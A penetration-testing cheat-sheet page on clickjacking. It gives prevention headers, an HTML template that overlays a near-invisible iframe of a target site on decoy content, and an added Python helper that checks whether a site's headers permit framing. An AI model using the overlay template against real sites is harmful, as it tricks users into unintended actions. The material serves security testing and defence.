Pentest Book
Clickjacking

General

Clickjacking is an interface-based attack in which a user is tricked into clicking actionable content on a hidden website by clicking on some other content in a decoy website layered on top of it.
    Preventions:
      X-Frame-Options: DENY / SAMEORIGIN / ALLOW-FROM
      Content-Security-Policy: frame-ancestors 'none' / 'self' / domain.com
```html
<!-- An example using the style tag and parameters is as follows: -->
<head>
  <style>
    /* target iframe: almost fully transparent and stacked above the decoy */
    #target_website {
      position: relative;
      width: 128px;
      height: 128px;
      opacity: 0.00001;
      z-index: 2;
    }
    /* decoy content sits underneath the invisible frame */
    #decoy_website {
      position: absolute;
      width: 300px;
      height: 400px;
      z-index: 1;
    }
  </style>
</head>
...
<body>
  <div id="decoy_website">
    ...decoy web content here...
  </div>
  <iframe id="target_website" src="https://vulnerable-website.com">
  </iframe>
</body>
```
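To verify that the preventions listed above are actually in place, here is an added Python helper (not part of the original page) that evaluates a response's X-Frame-Options and CSP frame-ancestors against a would-be framing origin; the header sets, page origin and framing origin used with it are constructed sample values.

```python
from urllib.parse import urlparse

def parse_csp(value: str) -> dict:
    """Split a Content-Security-Policy value into {directive: [source tokens]}."""
    policy = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def _source_matches(src: str, page: str, framer: str) -> bool:
    """Does one frame-ancestors source expression cover the framing origin?"""
    f, p, s = urlparse(framer), urlparse(page), src.lower()
    if s == "'none'":
        return False
    if s == "'self'":
        return (f.scheme, f.netloc) == (p.scheme, p.netloc)
    if s == "*":
        return True
    scheme, sep, host = s.rpartition("://")
    if sep and scheme != f.scheme:          # "https://host" form with another scheme
        return False
    if not sep and host.endswith(":"):      # bare scheme-source such as "https:"
        return f.scheme == host[:-1]
    host = host.split("/")[0]               # drop any path component
    if host.startswith("*."):               # wildcard covers subdomains only
        return (f.hostname or "").endswith(host[1:])
    return host in (f.netloc, f.hostname)

def framing_allowed(headers: dict, page: str, framer: str) -> bool:
    """True if a browser would render `page` inside a frame hosted on `framer`.
    frame-ancestors takes precedence over X-Frame-Options when both are present."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(h.get("content-security-policy", ""))
    if "frame-ancestors" in csp:
        return any(_source_matches(s, page, framer) for s in csp["frame-ancestors"])
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return urlparse(page)[:2] == urlparse(framer)[:2]   # same scheme + host
    # ALLOW-FROM is obsolete and ignored by current browsers, so it is treated
    # here as no protection; a missing or unknown value means the same.
    return True
```

Call `framing_allowed(response_headers, "https://vulnerable-website.com", "https://some-other-origin.example")` with the headers captured from the target; a `True` result means the page can be framed from that origin and is a candidate for the overlay shown above.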